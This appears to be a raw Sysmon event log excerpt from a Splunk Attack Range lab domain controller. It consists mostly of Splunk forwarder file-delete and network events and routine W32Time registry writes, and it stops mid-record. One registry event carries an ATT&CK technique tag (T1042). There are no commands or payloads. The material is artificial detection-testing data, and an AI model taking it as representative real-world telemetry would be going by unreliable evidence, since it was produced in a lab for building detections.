12:07:19.354{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4AA945367E616B1E9B73A99261EB137,SHA256=D9FAE96D97FE6572E34DD7FDEFE65636132EB9A59B173A7A01ED31121B7C2F8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010323Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:20.494{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=794A772EF6A23239AD03E112765EB19D,SHA256=11B08B48C2EADCA3377B4AD04D991434188F8AB6144B1C97F3F1E9311AFE5EAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010324Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:21.556{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44847EA18A4173551F7543C5EA4EE558,SHA256=19F1798413864ED7F8FDA2C30FB73A8C90A059AE054D91FC6134A31B40073D30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010326Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:22.587{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A00C6D67C48C09D579FEBD517ED9311,SHA256=4977DCA1CA8DEB2CF78AA87E834E54AE24D768DD431C4B97FF692BE71D83BF19,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000010325Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:20.649{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53685-false10.0.1.12-8000- 23542300x800000000000000010327Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:23.618{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AB54DEDF1E925624775D491E9C05B21,SHA256=B762CF2730C467347338AC3302268B2DE1BAB5865D9BA24E15576256E074657A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010330Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:24.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8008E9DFA6D4F295E20648730EC70448,SHA256=451511B5517B85966441BCE12C17E712446BAECF238C01C237A194619DDCF957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010329Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:24.681{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9ABA44B509432CEEFFCB63A1383EB3B5,SHA256=230CED6D81127327E0BA58B515CAE30F01A88FEA3FEFCD82258F82AF8CFC93BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010328Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:24.634{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C32961E4CE53AF211FCBD56FA6422E,SHA256=101AEEB2154965C3E11F8BAEF0CADFFD679C36254F3FEB903810A31A7440FAC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010332Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:25.665{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=551D0B7B21399E4D37D1C3BF5F878951,SHA256=424222B9E1B3090D2E4848639B38BC272B0B761F9D06CF5F147236D95C7D9E90,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010331Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:25.009{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x696d2715) 23542300x800000000000000010333Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:26.743{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6700506F41F0B0ADA0BFE18675B58FA,SHA256=8D0530FF79154ECA5D7529B6ED9C8A5CC8D9C98A6C63CB0B1D161BC898C32E1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010334Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:27.805{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39EC414AC8A95B798E21EC79F5A114C1,SHA256=BE10FE079941BA4A17D5DD82DC6512362C2E38BB06F02BC3B30A8DBA806D5C97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010336Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:28.851{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1356767F8AF1661BB14285341420072,SHA256=C3973585E96900B6726A0A95ABD5F1A087F02EBBFA0EB11C4CB91F2C4DD235C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010335Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:26.586{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53686-false10.0.1.12-8000- 23542300x800000000000000010337Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:29.929{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7F93726A25560BD0C65065765FBBC9,SHA256=7673D2D84EE1BF2BED724905A92E8333EABA999E0A191EBE9CCD66870AF5FE29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010338Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:30.976{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D0BCA9509F110A25B6BD1E61B94E733,SHA256=92B64118EADDEE336EA4050ADBFA7B2B4D5FE61D0411133670B8EF26C0FB3B41,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000010340Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1042SetValue2021-03-31 12:07:32.288{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXEHKU\S-1-5-21-4055678433-3894535204-3898404691-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.exe\OpenWithProgids\exefileBinary Data 23542300x800000000000000010339Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:32.023{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37AA25715E975E6186B03E2BA4460B35,SHA256=265193D61DDB21A24B61099E16E592F8FE602EA25DA87FEC26C0E038CA518910,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:32.539{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53687-false10.0.1.12-8000- 13241300x800000000000000010351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000010350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000661e9) 13241300x800000000000000010349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261e-0x0c13e85b) 13241300x800000000000000010348Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72626-0x6dd8505b) 13241300x800000000000000010347Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0xcf9cb85b) 13241300x800000000000000010346Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000010345Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x000661e9) 13241300x800000000000000010344Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 
12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7261e-0x0c1cfcc1) 13241300x800000000000000010343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d72626-0x6de164c1) 13241300x800000000000000010342Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:33.116{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7262e-0xcfa5ccc1) 23542300x800000000000000010341Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:33.038{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80D253C4A478ED515F35076362B54708,SHA256=374128CF832819708709040778CC38B73B63E9774AB306E692F326BCF8B40DCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:34.100{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5E3410BB412BE4E59EF25B0CBE4EADA,SHA256=E10EB053A4980A8EC82AAC31AE6481EF252D625481990379750CA99989F8BDAF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:35.209{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CBD32C8039B1FDB1F2C6FD1A4DDD455,SHA256=EB7430140E1E42B707C0CE4396E9FCE731A583D56A5ACE1AED8CF272494A3298,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010355Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:36.209{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDBC1F34CD8816708363495449CB250,SHA256=EC748975A3AD9AECBC6A0639E7AAD5762DE4CB17EC62EFD86B4111515EBFB091,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010356Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:37.224{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37AC3F6F3B04A0903FC8C0034F64BF09,SHA256=C1952EE8D4FA27CA879D39B7D78161903B3C5632EA28BE7258EFABFECBD3FC82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010357Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:38.240{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A42490A772FDA9948E1A3F880A03C780,SHA256=6A3034A7820BAA06C451E6E3432CE3E6D343BF53A6C831DAA7562FB3EB4EA0C3,IMPHASH=00000000000000000000000000000000falsetrue 
354300x800000000000000010359Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:38.492{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53688-false10.0.1.12-8000- 23542300x800000000000000010358Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:39.271{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D18C610CDF8913CDFB434C8D04B8ABD,SHA256=DFB411118DF789F0782030F0C057D73064F6FC6E49602BF908699EED2735511A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010360Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:40.333{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B830AFA92E9C2F6E248E1D503C72F2C,SHA256=42AC9A2309355B932F99EC943AFD34AC4D2C1D6FC1E32655CD1F00B574C6320F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010362Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:41.348{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47460F6948C89E74587C8C60C9F4CF4,SHA256=1E00E376D48AEFF871A114BCE9307A92EACF3F0577E7DC39E69DAF5B79061334,IMPHASH=00000000000000000000000000000000falsetrue 
13241300x800000000000000010361Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:07:41.005{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x72f5f46a) 23542300x800000000000000010363Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:42.411{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D23C8BAE2A3811FDBD24AB318FFC9B7,SHA256=A5B315440D1A0168BE8BA59494473E8E8CE35914F09D8D5A9505CF264871FE94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010364Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:43.488{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B7057B4D96AA9331CEC05DCB543EF280,SHA256=78A9F4CE09A351CF4934C5A8F6B76BA935D2BF44B5FD5554A44B497642474EEB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010368Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:43.633{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53689-false10.0.1.12-8000- 23542300x800000000000000010367Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.551{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B07CCAF038197871C1D282678163C377,SHA256=3E10052ECAF3A2DA27FE9855203D92EA3D5E6451B9533BB38E92C2E03D859289,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010366Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x800000000000000010365Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:44.457{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0CC6B52364349F29C7BE76219CA6054D,SHA256=11E21B75C4986E0C090F04A7F75362DD2D8F1CE63EC9D771943C9C34D816C0DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010369Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:45.566{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8170CCBAB273FEF5AAE74449BEF1FC93,SHA256=2138739B6AF3F18E134E66F2979910DDDD6B93D0E17228A5C666ECD97F999F92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010370Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:46.582{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=367FA486267D3BD5272B38691640F076,SHA256=1958ECE6527DEE85FE240DFE1EB41040D02EF1D3B3093D9115A366BB321AAB35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010371Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:47.659{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C49A3E4ED07053B70EA7D8E27EB55E,SHA256=E0C88638F29A95C8E2FEE71F53E1ADC0D776919A8292E3678FB8730515D932C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010373Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:48.893{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010372Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:48.800{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA539C8C305B870AFD7D6B376F8B7D7D,SHA256=D636321209C213854E4121FA1443A16CB0E73A6A9E75AAAE38E316283FE3A1BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010374Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.831{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E063D24949200AD037728394B24A4CE,SHA256=AD2C372FD2602FC773D08891014690DD10627E46A25C3BAEB0532B0EF5BFBA80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010375Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:50.846{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EC27B6833E7D1AF9309013B6E01109A,SHA256=5D2442E74C09C1C29551B31D2E6BFC530CB1BE379FFC1C09386DAFE51DFC2194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010378Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:51.862{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26597D6F31174FD7DE45C5DAC85A7EE1,SHA256=8610C86ACD2CF04C0AD2904F7EE2B03F83BA58D460D52373479C2D64DC93CB80,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010377Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.570{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53691-false10.0.1.12-8000- 354300x800000000000000010376Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:49.273{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53690-false10.0.1.12-8089- 23542300x800000000000000010379Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:52.893{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31244585B0C5F0C4143049F3C4616D3A,SHA256=2FBE250B450C49CBC8576D9FAECE6160C3A0329A9A85F77F8264D6C733A9C4B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010380Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:53.924{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 